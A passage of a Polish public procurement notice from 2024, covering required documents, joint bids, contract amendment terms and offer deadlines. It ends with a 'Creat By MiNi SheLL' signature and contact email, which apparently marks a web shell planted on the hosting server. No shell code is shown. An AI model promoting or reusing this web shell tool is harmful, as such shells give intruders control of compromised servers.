lub sprawozdania z badań przeprowadzonych przez tę jednostkę potwierdzającego zgodności danego produktu z podanymi w Formularzu ofertowym stanowiącym Załącznik nr 1 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Na podstawie art. 107 ust. 2 ustawy Pzp - jeżeli wykonawca nie złoży przedmiotowych środków dowodowych wraz z ofertą lub złożone przedmiotowe środki dowodowe będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/><br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/><br/>Oferta wykonawcy, który nie złożył lub nie uzupełnił na wezwanie przedmiotowych środków dowodowych lub złożone na wezwanie przedmiotowe środki dowodowe będą nadal niekompletne – zostanie odrzucona na podstawie art. 226 ust. 1 pkt 2 c) ustawy Prawo zamówień publicznych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Każdy Wykonawca do upływu terminu składania ofert zobowiązany jest złożyć:<br/>1.1.Formularz ofertowy stanowiący załącznik Nr 1 do SWZ - składany jest pod rygorem nieważności w formie elektronicznej<br/>(podpisany kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej (opatrzonej podpisem zaufanym lub<br/>podpisem osobistym).<br/>1.2.Aktualne na dzień składania ofert Oświadczenie o niepodleganiu wykluczeniu składane na podstawie art. 125 ust. 1<br/>ustawy<br/>Prawo zamówień publicznych (według wzoru – załącznika Nr 2 do SWZ)<br/>1.3.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>a) Aktualne na dzień składania ofert Oświadczenie o niepodleganiu wykluczeniu składane na podstawie art. 125 ust. 1<br/>ustawy Prawo zamówień publicznych (według wzoru – załącznika Nr 2 do SWZ)<br/>b) oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp – składają tylko Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Z oświadczenia musi wynikać, które dostawy wykonają poszczególni Wykonawcy (według wzoru –<br/>załącznika Nr 4 do SWZ)<br/>1.4.Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z<br/>oświadczeniem własnym, o którym mowa w pkt 1 .2, 1.3, także:<br/>a) oświadczenie podmiotu udostepniającego zasoby o niepodleganiu wykluczeniu zgodnie z art. 125 ust. 1 ustawy Pzp<br/>aktualne na dzień składania ofert (wg wzoru - Załącznik Nr 2a do SWZ),<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia (jeżeli dotyczy) – wg wzoru stanowiącego załącznik Nr 3 do SWZ<br/>Pełnomocnictwo, w przypadku podpisywania dokumentów (oferty) oraz innych dokumentów składanych wraz z ofertą przez<br/>osoby(ę) niewymienioną w dokumencie rejestracyjnym Wykonawcy.<br/>Przedmiotowe środki dowodowe określone w Rozdziale VII SWZ. – jeżeli dotyczy<br/>Samooczyszczenie<br/>Uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się o udzielenie zamówienia publicznego:<br/>1) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia kluczowych zadań dotyczących zamówienia na usługi – na podstawie art. 60<br/>ustawy Pzp.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia.<br/>2) Wykonawcy wspólnie ubiegający się o zamówienie (Konsorcjum/ wspólnicy spółki cywilnej) w rozumieniu art. 58 ustawy<br/>Pzp:<br/>a) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia i wniesienie<br/>zabezpieczenia należytego wykonania umowy;<br/>b) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia, zgodnie z art. 58 ust. 2 ustawy Pzp – fakt ustanowienia<br/>pełnomocnika musi wynikać z załączonych do oferty dokumentów – wszelka korespondencja prowadzona będzie wyłącznie<br/>z pełnomocnikiem;<br/>c) pełnomocnictwo powinno jednoznacznie wskazywać jakiego postępowania dotyczy, Wykonawców wspólnie ubiegających<br/>się o zamówienia, dane pełnomocnika, czynności jakie w postępowaniu ma prawo wykonywać pełnomocnik;<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie dotyczące braku podstaw do<br/>wykluczenia oraz oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu składa odrębnie każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>4) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się<br/>o zamówienie.<br/>5) Wymagania dotyczące wykonawcy stosuje się odpowiednio do wykonawców, wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przyszłe zobowiązania wykonawcy związane z umową i jej realizacją są określone przepisami ustawy z dnia 11 września<br/>2019r Prawo zamówień publicznych (t.j. Dz.U.2024 poz. 1320) oraz przepisami Kodeksu Cywilnego.<br/>2. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy<br/>stanowią załącznik nr 6/6a do SWZ.<br/>3. Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z uwzględnieniem postanowień wynikających z<br/>treści niniejszej SWZ, danych zawartych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego,<br/>które zostaną wprowadzone do treści tej umowy, o których mowa w pkt. 2.<br/>4. Zamawiający wymaga, aby wybrany w danym zadaniu wykonawca zawarł z nim umowę na warunkach określonych w<br/>Ogłoszenie nr 2024/BZP 00517710/01 z dnia 2024-09-26<br/>2024-09-26 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>projektowanych postanowieniach umowy.<br/>5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartych umów w przypadkach i na warunkach<br/>określonych w §9 projektowanych postanowień umowy (stanowiących załącznik Nr 6/6a do SWZ).<br/>6. W przypadku okoliczności wymienionych w art. 456 ustawy Pzp Zamawiający może odstąpić od umowy w terminie 30 dni<br/>od powzięcia wiadomości o wskazanych okolicznościach.<br/><br/><br/>§ 11 <br/>ZMIANY TREŚCI UMOWY<br/>1.	Zmiany umowy mogą być dokonywane w zakresie dopuszczonym przez ustawę Prawo zamówień publicznych, wymagają zgodnej woli stron oraz zachowania formy pisemnej w postaci aneksu, pod rygorem nieważności w poniższym zakresie: <br/>1)	Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba – w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków; <br/>2)	wartość umowy może ulec zmianie w przypadku zmiany ustawowej stawki podatku VAT, w zakresie wynikającym z tej zmiany; <br/>2.	Zgodnie z art. 455 ust. 2 ustawy Prawo zamówień publicznych dopuszczalne są zmiany umowy bez przeprowadzenia nowego postępowania o udziale zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, w przypadku zamówienia na usługi lub dostawy, a zmiany te nie powodują zmiany ogólnego charakteru umowy – na tej podstawie całkowita wartość umowy, może ulec zwiększeniu o nie więcej niż 10% wartości określonej w umowie, w § 2 ust. 1 umowy na skutek nieznacznego zwiększenia zakresu zamówienia. Zamawiający dokonywać będzie weryfikacji zaproponowanych cen jednostkowych w celu stwierdzenia czy nie przekraczają one aktualnych cen rynkowych.<br/>3.	Zgodnie z art. 455 ust.1 ustawy Prawo zamówień publicznych przewiduje się możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie , której dokonano wyboru Wykonawcy w zakresie: <br/>1)	Zmiany przedmiotu zamówienia na przedmiot zamówienia o parametrach równych lub wyższych przy zachowaniu cen wskazanych w umowie w sytuacji, gdy dostawa oferowanego przedmiotu zamówienia nie jest możliwa z przyczyn niezależnych od Wykonawcy <br/>Zmiana wymaga pisemnego zgłoszenia przez Wykonawcę zmiany ze wskazaniem parametrów produktu nowo zaproponowanego, ze wskazaniem producenta, nazwy handlowej oraz uzasadnieniem okoliczności zmiany i faktu niemożności przewidzenia tej zmiany przez Wykonawcę na etapie składania oferty. Zamawiający po dokonaniu weryfikacji zgodności nowo proponowanych zaakceptuje lub negatywnie rozpatrzy wniosek o zmianę- w przypadku gdy wymagania minimalne w zakresie parametrów, właściwości , standardów jakościowych nie zostaną spełnione. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-28 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z dokumentami określonymi w rozdziale XII pkt. 2 i 3 należy złożyć za pośrednictwem platformy pod adresem Platformy Zakupowej pod adresem: https://platformazakupowa.pl/pn/41blsz/proceedings, na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-28 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com